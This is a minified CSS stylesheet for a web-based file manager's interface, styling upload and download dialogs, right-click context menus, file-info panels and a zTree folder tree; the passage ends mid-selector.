.ajaxError{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;color:#f60;position:absolute;left:0px;right:0px;bottom:0px;top:40px;overflow:auto;padding:10px;}.pathinfo{font-size:1em;width:350px;min-height:300px;padding:20px 0 10px 0;color:#446;}.pathinfo .line{width:95%;margin:8px auto 8px auto;height:0px;border-bottom:1px solid #eee;}.pathinfo .download-url{padding:0px 5px;width:140px;line-height:32px;height:32px;}.pathinfo .p{margin-bottom:2px;}.pathinfo .p .icon{width:40px;height:40px;float:left;border:1px solid #f6f6f6;margin-left:10px;}.pathinfo .p input.info-chmod{padding:0px 10px;width:55px;color:#999;margin-right:10px;display:inline-block;height:25px;line-height:25px;}.pathinfo .p .title{width:80px;float:left;color:#888;text-align:right;}.pathinfo .p .content{float:left;width:240px;word-break:break-all;color:#666;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;font-size:1em;margin-left:15px;}.pathinfo .p .content.file-md5-loading{background:url("../../../images/common/loading.gif") 18px 5px no-repeat;}.pathinfo input{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;line-height:28px;padding:2px 5px;width:150px;float:left;height:28px;border-radius:3px;}.pathinfo input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.pathinfo .download-url{margin-right:0;border-radius:3px 0 0 3px;}.file-drag-upload .aui-content{overflow-y:scroll;}.fileupload{padding-left:25px;}.fileupload span.status{padding-left:10px;font-size:10px;color:#f96;}.movie-player-dialog{overflow:hidden;}.flash-player{width:100%;height:100%;}.wmp-player{width:0%;height:0%;}.movie-player-dialog .aui-content{background:#000;}.dialog-path-remove .aui-content{word-wrap:break-word;width:auto;}.server-dwonload-textarea textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.server-dwonload-textarea textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.file-upload-box{height:385px;padding:5px;min-width:365px;overflow:hidden;}.file-upload-box .topbar-nav{border-bottom:1px solid #ddd;margin-top:6px;}.file-upload-box .menu{display:block;text-decoration:none;float:left;padding:0px 15px;height:26px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#eeeeee');background-image:-webkit-linear-gradient(top,#fff,#eee);background-image:-moz-linear-gradient(top,#fff,#eee);background-image:-o-linear-gradient(top,#fff,#eee);background-image:-ms-linear-gradient(top,#fff,#eee);background-image:linear-gradient(top,#fff,#eee);-pie-background:linear-gradient(to top,#fff,#eee);font-size:1em;border:1px solid #ccc;text-align:center;line-height:24px;margin-right:5px;margin-bottom:-1px;color:#444;border-radius:4px 4px 0 0;}.file-upload-box .menu.this{background:#fff;border-bottom:1px solid #fff;}.file-upload-box .menu:hover{background:#fff;}.file-upload-box .upload-box{margin-top:10px;}.file-upload-box .download-btn-group{margin-left:-10px;margin-top:-2px;margin-top:-4px \9;}.file-upload-box .download-btn-group .download-start{border-radius:0px;}.file-upload-box .upload-box-tips .btn.btn-default{border-radius:3px;color:#555;}.file-upload-box .upload-box-tips .btn-group>.btn:last-child:not(:first-child),.file-upload-box .upload-box-tips .btn-group>.dropdown-toggle:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0;}.file-upload-box div a.left{margin-left:10px;}.file-upload-box div a.right{position:absolute;right:5px;}.file-upload-box span.info{font-size:1em;font-style:italic;padding:0px 0 5px 10px;}.file-upload-box i{font-size:1em;color:#aaa;padding-left:10px;}.file-upload-box .list{margin:10px 15px 10px 0;}.file-upload-box .list input{margin-left:10px;width:190px;height:22px;line-height:24px;padding:0px 3px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.file-upload-box .list input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.file-upload-box .submit input{float:right;padding:4px 20px;background:#ddd;border:none;margin-right:36px;margin-top:10px;}.file-upload-box .submit input:hover{background:#bbb;}.file-upload-box .submit input:active{background:#444;color:#fff;}.file-upload-box .uploader-content{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;background:url("../../../images/common/drop_upload.png") no-repeat center;}.file-upload-box #downloader{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;}.file-upload-box .webuploader-container{position:relative;}.file-upload-box .webuploader-element-invisible{position:absolute !important;clip:rect(1px 1px 1px 1px);clip:rect(1px,1px,1px,1px);}.file-upload-box .webuploader-pick{position:relative;display:inline-block;color:#fff;text-align:center;height:27px;line-height:27px;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);cursor:pointer;padding:0px 15px;}.file-upload-box .webuploader-pick-hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .upload-cert{width:24px;background:#def;height:100%;float:left;cursor:pointer;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);height:27px;line-height:27px;position:relative;z-index:10;padding:0;border:none;margin-left:-5px;border-left:1px solid rgba(0,0,0,0.1);border-top-right-radius:3px;border-bottom-right-radius:3px;}.file-upload-box .upload-cert .caret{margin-top:-2px;margin-left:-1px;border-top:4px solid #fff;}.file-upload-box .upload-cert-box .dropdown-menu{right:inherit;top:inherit;margin-top:30px;}.file-upload-box .upload-cert-box .dropdown-menu:before{right:inherit;left:10px;}.file-upload-box .upload-cert-box .dropdown-menu:after{right:inherit;left:11px;}.file-upload-box .upload-cert-box.open.upload-cert,.file-upload-box .upload-cert-box .upload-cert:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .webuploader-pick-disable{opacity:0.6;filter:alpha(opacity=60);pointer-events:none;}.file-upload-box .btns{margin-bottom:10px;font-size:1em;height:28px;}.file-upload-box .btns .tips{float:right;line-height:30px;}.file-upload-box .btns #picker{float:left;}.file-upload-box .upload-box-tips{line-height:34px;color:#888;position:absolute;right:10px;}.file-upload-box .upload-box-config{box-shadow:inset 0px 1px 6px rgba(0,0,0,0.3);border-radius:2px;margin-bottom:10px;padding:4px;}.file-upload-box .upload-box-config .upload-check-box{margin-left:10px;}.file-upload-box .upload-box-config label{margin-left:15px;}.file-upload-box .upload-box-config label input{margin-right:5px;}.file-upload-box .uploader-list .item,.file-upload-box .download-list .item{padding:0px;height:35px;overflow:hidden;position:relative;border-bottom:1px solid #ccc;background:#fefefe;}.file-upload-box .uploader-list .item .info,.file-upload-box .download-list .item .info{color:#224;line-height:35px;padding:0 5px;z-index:100;position:relative;font-size:1em;}.file-upload-box .uploader-list .item .info span,.file-upload-box .uploader-list .item .info a,.file-upload-box .download-list .item .info span,.file-upload-box .download-list .item .info a{float:left;height:30px;display:block;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}.file-upload-box .uploader-list .item .info .title,.file-upload-box .download-list .item .info .title{color:#3A87AD;width:160px;width:50%;font-weight:800;}.file-upload-box .uploader-list .item .info .size,.file-upload-box .download-list .item .info .size{width:45px;text-align:center;color:#3A87AD;font-size:12px;}.file-upload-box .uploader-list .item .info .state,.file-upload-box .download-list .item .info .state{width:100px;width:27%;text-align:right;font-size:12px;}.file-upload-box .uploader-list .item .info .font-icon,.file-upload-box .download-list .item .info .font-icon{margin-left:12px;font-size:20px;width:20px;line-height:35px;cursor:pointer;color:#bbb;}.file-upload-box .uploader-list .item .info .font-icon:hover,.file-upload-box .download-list .item .info .font-icon:hover{text-decoration:none;color:#f60;}.file-upload-box .uploader-list .item .info .icon-ok,.file-upload-box .download-list .item .info .icon-ok{color:#40AA53;}.file-upload-box .uploader-list .item .info .error,.file-upload-box .download-list .item .info .error{color:#f30;}.file-upload-box .uploader-list .item.success,.file-upload-box .download-list .item.success{background:#eaf8ff;}.file-upload-box .uploader-list .item.error,.file-upload-box .download-list .item.error{background:#ffe8e6;}.file-upload-box .uploader-list .item .progress,.file-upload-box .download-list .item .progress{height:38px;margin:0px;width:100%;border-radius:0;box-shadow:none;position:absolute;top:0;}.file-upload-box .uploader-list .item .progress-bar,.file-upload-box .download-list .item .progress-bar{background-color:#adf;background-image:linear-gradient(45deg,rgba(255,255,255,0.35) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.35) 50%,rgba(255,255,255,0.35) 75%,transparent 75%,transparent);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ddeeff',endColorstr='#88ccff',GradientType=1);BACKGROUND-REPEAT:repeat-x;}.file-upload-box .uploader-list .success:hover,.file-upload-box .download-list .success:hover{cursor:pointer;background:#def;border-bottom:1px solid #3A87AD;}@media screen and (-ms-high-contrast:active),(-ms-high-contrast:none){.btn{ padding:5px 14px;} input[type='checkbox'].kui-checkbox-ios.size-big + em{ height:27px;} #body .system-content .right-frame .user-list table tr td.select input{ position:relative;top:4px;} #body table tr input[type='text']{ line-height:22px;} .do-search-box .search-header .btn-right{ margin:-9px 0 0 -2px;height:23px;} .appbox .appline.icon .open{ margin-top:-2px;} .appbox .appline label{ position:relative;top:-4px;} #body .main .group-editor .tag input{ position:relative;top:-5px;} .share-dialog .aui-border{ overflow:auto;} .share-dialog .content-box .content-info .input-line.select-path a.select-btn{ padding:3px 8px 4px;} .kui-radio + span, .kui-checkbox + span{ position:relative;top:-6px;} .kui-radio.size-small + span, .kui-checkbox.size-small + span{ position:relative;top:-4px;} .kui-radio.size-smallx + span, .kui-checkbox.size-smallx + span{ position:relative;top:-2px;}}@media (max-width:743px){html #body .app-menu-left, html body .app-menu-left{ width:50px;min-width:50px;} html #body .app-menu-left .search{ opacity:0.001;} html #body .menu-left .setting a.selected, html body .menu-left .setting a.selected{ padding-left:0px;margin-left:-5px;} html #body .main.app-content, html body .main.app-content{ left:50px;} html #body .main.app-content .app-list, html body .main.app-content .app-list{ justify-content:space-around;} html .form-box .form-row .setting-title{ text-align:left;} html .form-box .form-row.form-userSelect .setting-content{ padding:10px 5%;} html .form-box .form-row .setting-content{ width:90%;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{ width:100%;height:40px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{ left:0px;top:80px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{ float:left;} html #body.plugin-page .app-menu-left .line, html body.plugin-page .app-menu-left .line{ padding:4px 0;} html body #body .menu-left, html body #body .app-menu-left{ width:50px;min-width:50px;} html body #body .menu-left h1, html body #body .app-menu-left h1{ font-size:14px;font-weight:800 !important;padding:10px 0px 10px 0px;text-align:center;} html body #body .menu-left .font-icon, html body #body .app-menu-left .font-icon{ padding-right:30px;} html #body .setting-tools-right, html body .setting-tools-right{ top:0;} html #body .main .nav a, html body .main .nav a{ padding:5px 10px;} html #body .main .nav, html body .main .nav{ margin-right:0px;} html #body .setting-tab, html body .setting-tab, html #body .system-content, html body .system-content{ margin-right:10px;} html #body .main, html body .main{ left:50px;width:auto;margin-right:10px;} html .form-box .form-row .desc, html .form-box .form-row .setting-content i{ display:block;} html #body .setting-tab .form-row, html body .setting-tab .form-row, html #body .system-content .form-row, html body .system-content .form-row{ background:#fafafa;border-radius:4px;padding:0 5px;} html .form-box .form-row .setting-title{ height:20px;line-height:20px;} html .form-box .form-row{ padding:0;} html .form-box .form-row input[type='text'], html .form-box .form-row input[type='password'], html .form-box .form-row input[type='number']{ width:180px;} html .form-box .form-row #wallpage-url{ width:150px !important;} html #body .main .section .content .box p, html body .main .section .content .box p{ text-indent:10px;} html #body .system-content.setting-member{ width:800px;} html body.setting-page .select-user-group .right-content, html body.setting-page .select-user-group .left-content{ width:170px;} html .topbar .content .top-right ul.dropdown-menu.topbar-language{ width:235px;max-height:800px;} html #body .main .section .box, html body .main .section .box{ margin-right:10px;} html #body .main .section .box .list, html body .main .section .box .list{ width:95px;height:95px;} html #body .main .section .box .list .ico, html body .main .section .box .list .ico{ width:75px;height:60px;} html #body .panel, html body .panel{ margin-right:0px;} html #body .main.app-content .app-list .app-li, html body .main.app-content .app-list .app-li{ margin:0 5px 20px 0;width:130px;} html #body .main.app-content .app-model, html body .main.app-content .app-model{ padding:10px;}}@-webkit-keyframes fadein{0%{ opacity:0;} 50%{ opacity:0.4;}}.playmusic-icon{display:none;}.context-menu-list{margin:0;margin-left:4px;min-width:190px;max-width:300px;font-size:1em;display:inline-block;position:absolute;list-style-type:none;padding:8px 0px;border:none;border:1px solid #ccc \9;border-radius:4px;background:#fff;-webkit-box-shadow:0 10px 80px rgba(0,0,0,0.4);-moz-box-shadow:0 10px 80px rgba(0,0,0,0.4);box-shadow:0 10px 80px rgba(0,0,0,0.4);}.context-menu-list span b{display:inline-block;font-size:1em;font-weight:200;color:#aaa;padding-left:10px;min-width:50px;text-align:right;overflow:hidden;position:absolute;right:10px;width:65px;}.context-menu-list .hover>span>b{color:#fff;}.context-menu-list.menu-auto-fit{top:5px !important;}.context-menu-list li.selected{border-left:none !important;background:none;}.context-menu-list li.selected i.font-icon{color:#aaa;font-family:FontAwesome;font-weight:normal;font-style:normal;}.context-menu-list li.selected i.font-icon:before{content:"\f00c" !important;}.context-menu-list .context-menu-submenu:after{content:"\f0da";font-family:FontAwesome;display:inline-block;float:right;margin-right:0px;right:10px;position:absolute;}.context-menu-list .context-menu-item{display:block;cursor:pointer;white-space:nowrap;clear:both;line-height:25px;height:23px;position:relative;border:none;padding:0px 20px 0 15px;color:#222;-webkit-transition:background-color .1s;-moz-transition:background-color .1s;-o-transition:background-color .1s;-ms-transition:background-color .1s;transition:background-color .1s;}.context-menu-list .context-menu-item .font-icon{display:inline-block;width:16px;text-align:center;font-size:1.2em;color:#aaa;margin-right:15px;vertical-align:middle;margin-top:-2px;padding:0;}.context-menu-list .context-menu-item.disabled,.context-menu-list .context-menu-item.disable{cursor:not-allowed;pointer-events:auto;color:#ccc;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{color:#ddd;}.context-menu-list .context-menu-item.disabled.hover,.context-menu-list .context-menu-item.disable.hover{color:#ccc;cursor:default;background-color:#fff;}.context-menu-list .context-menu-item.disabled.hover .font-icon,.context-menu-list .context-menu-item.disable.hover .font-icon{color:#ddd;}.context-menu-list .context-menu-item.hover{cursor:pointer;color:#fff;background:#63acff;background-color:none \9;}.context-menu-list .context-menu-item.hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item span i{float:right;text-align:right;font-style:normal;color:#888;}.context-menu-list .context-menu-item.context-menu-separator{height:2px;line-height:0;border-bottom:1px solid #eee;margin:2px 0 4px;}.context-menu-list .context-menu-item > .context-menu-list{display:none;right:-5px;top:5px;}.context-menu-list .context-menu-item.hover > .context-menu-list{display:block;}.context-menu-list .context-menu-item.hover > .context-menu-list .font-icon{color:#aaa;}.context-menu-list .context-menu-item.hover > .context-menu-list .hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item .context-menu-accesskey{text-decoration:underline;}.context-menu-list .context-menu-item .line-top{border-top:1px solid #ddd !important;}.font-icon.icon-home,.x-tree-self{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;filter:none;-ms-filter:none;}.font-icon.icon-home:before,.x-tree-self:before{content:"" !important;}.font-icon.icon-circle-arrow-up{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.font-icon.icon-circle-arrow-up:before{content:"" !important;}.x-tree-fav.small{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.x-tree-fav.small:before{content:"" !important;}.frame-right #search .font-icon.icon-search{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -736px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;margin-top:4px;}.frame-right #search .font-icon.icon-search:before{content:"" !important;}.context-menu-list .font-icon:before{color:#249dff;background-image:-webkit-linear-gradient(2deg,#249dff,#08558a);background-clip:text;text-fill-color:transparent;-webkit-text-fill-color:transparent;-webkit-background-clip:text;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{opacity:0.3;filter:alpha(opacity=30);}.context-menu-list .context-menu-item.search .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 0px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.search .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open .font-icon,.context-menu-list .context-menu-item.open-the-path .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open .font-icon:before,.context-menu-list .context-menu-item.open-the-path .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.upload .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.upload .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.down .font-icon,.context-menu-list .context-menu-item.download .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.down .font-icon:before,.context-menu-list .context-menu-item.download .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.cute .font-icon,.context-menu-list .context-menu-item.cute-to .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.cute .font-icon:before,.context-menu-list .context-menu-item.cute-to .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.copy .font-icon,.context-menu-list .context-menu-item.copy-to .font-icon,.context-menu-list .context-menu-item.copy-see .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -96px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.copy .font-icon:before,.context-menu-list .context-menu-item.copy-to .font-icon:before,.context-menu-list .context-menu-item.copy-see .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt:before{content:"" !important;}.context-menu-list .context-menu-item.newfile .icon-expand-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfile .icon-expand-alt:before{content:"" !important;}.context-menu-list .context-menu-item.rname .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.rname .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.past .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.past .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.remove .font-icon,.context-menu-list .context-menu-item.fav-remove .font-icon,.context-menu-list .context-menu-item .close .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.remove .font-icon:before,.context-menu-list .context-menu-item.fav-remove .font-icon:before,.context-menu-list .context-menu-item .close .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.zip .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.zip .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt:before{content:"" !important;}.context-menu-list .context-menu-item.share .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-15px -703px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.share .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open-text .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -702px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open-text .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.setBackground .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -609px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.setBackground .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.fav .font-icon,.context-menu-list .context-menu-item.fav-page .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.fav .font-icon:before,.context-menu-list .context-menu-item.fav-page .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0px -577px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture:before,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture:before{content:"" !important;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -528px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort:before{content:"" !important;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -625px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-code-fork{display:inline-block;background-image:url("../../../images/file_icon/icon_app/history.png");width:16px !important;background-repeat:no-repeat;background-size:100% 100%;}.context-menu-list .context-menu-item .font-icon.icon-code-fork:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-info{color:#fff !important;background:#c4e5ff;text-align:center;width:15px;border-radius:50%;height:15px;line-height:15px;margin-right:15px;box-shadow:0 0 0 1px #6db9f5;}.ztree{margin:0px;padding:10px 0px;font-size:1em;}.ztree li{padding:0;margin:0;list-style:none;text-align:left;white-space:nowrap;outline:0;}.ztree li ul{margin:0;padding:0;}.ztree li.level0{margin-bottom:4px;}.ztree li.level0>span.tree_icon{width:20px;}.ztree li span{line-height:24px;}.ztree li span.button{line-height:0;margin:0;display:inline-block;vertical-align:middle;cursor:pointer;outline:none;background-color:transparent;background-repeat:no-repeat;height:24px;width:20px;margin-right:5px;}.ztree li span.button.switch{width:25px;height:25px;margin-right:0px;background:none;text-align:center;line-height:25px;}.ztree li span.button.switch:hover{background:rgba(0,0,0,0.03);}.ztree li span.button.switch:after{content:"\f0da";font-family:FontAwesome;color:#aaa;text-decoration:inherit;font-size:1.25em;line-height:16px;padding-left:6px;-webkit-font-smoothing:antialiased;}.ztree li span.button.switch.noline_docu:after{content:' ';}.ztree li span.button.switch.noline_open:after,.ztree li span.button.switch.noline_open_hover:after{content:"\f0d7";}.ztree li span.button.switch.switch_hover:after{color:#63acff;}.ztree li span.button.ico_loading{background:url("../../../images/common/loading_tree.gif") no-repeat 0 0px transparent !important;}.ztree li span.button.ico_loading .x-item-file{display:none;}.ztree li span.tree_icon{height:21px;width:21px;background:none;overflow:hidden;}.ztree li span.tree_icon img{width:100%;max-width:100%;max-height:100%;}.ztree li a{padding-top:0px;cursor:pointer;text-decoration:none;display:block;margin:0;color:#333;vertical-align:top;line-height:24px;height:24px;padding-left:10px;border:1px solid #fff;position:relative;}.ztree li a:hover{text-decoration:none;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;background:#eee;height:24px;border:1px solid #eee;}.ztree li a.curSelectedNode,.ztree li a.curDropTreeNode{border:1px solid #63acff;background:#63acff;line-height:24px;height:24px;color:#fff;}.ztree li a.curSelectedNode .button.switch:after,.ztree li a.curDropTreeNode .button.switch:after{color:#fff !important;}.ztree li a.curDropTreeNode{box-shadow:0 0 0 1px #fff inset !important;}.ztree li a.curSelectedNode_Edit{border:1px solid #63acff;background:#63acff;color:black;height:24px;}.ztree li a input.rename{height:25px;line-height:24px;padding:0;margin:0;border:none;outline:none;margin-left:-3px;padding-left:3px;width:106px;position:absolute;margin-top:-1px;}.ztree li a span.button.root_docu,.ztree li a span.button.noline_docu{background:none;}.ztree li a .menu-item{display:none;position:absolute;right:4px;top:4px;width:14px;height:13px;box-sizing:content-box;text-align:center;border:1px solid #ccc;background:#fff;border-radius:2px;cursor:pointer;z-index:50;}.ztree li a .menu-item:hover{border-color:#3399ff;background:#dff1ff;box-shadow:0 0 5px rgba(0,0,0,0.1);}.ztree li a .menu-item:hover .cert{border-top-color:#3399ff;}.ztree li a .menu-item .cert{margin-top:5px;margin-left:3px;width:0;height:0;border-left:4px solid transparent;border-right:4px solid transparent;border-top:5px solid silver;}.ztree li a:hover .menu-item,.ztree li a.curSelectedNode .menu-item{display:block;}ul.ztree.zTreeDragUL{margin:0;padding:0;position:absolute;width:auto;height:auto;background-color:#63acff;border:1px solid #63acff;opacity:0.5;filter:alpha(opacity=50);}ul.ztree.zTreeDragUL li a span.space{display:none !important;}ul.ztree.zTreeDragUL li a{padding:4px 10px 0 10px;color:#fff;}ul.ztree.zTreeDragUL li span.button.switch{display:none;}.ztree li a.tmpTargetNode_inner{background:#0076fc;border:1px solid #3091ff;color:#fff;}.ztree li a.tmpTargetNode_prev{border-bottom:1px solid #f96;}.ztree li a.tmpTargetNode_next{border-bottom:1px solid #f96;}span.tmpzTreeMove_arrow{display:inline-block;margin:4px 0 0 2px;position:absolute;border-color:transparent transparent transparent #fff;border-style:solid;border-width:7px 0px 7px 7px;width:0;height:0;_border-top-color:white;_border-bottom-color:white;_filter:chroma(color=white);}.frame-left .ztree li 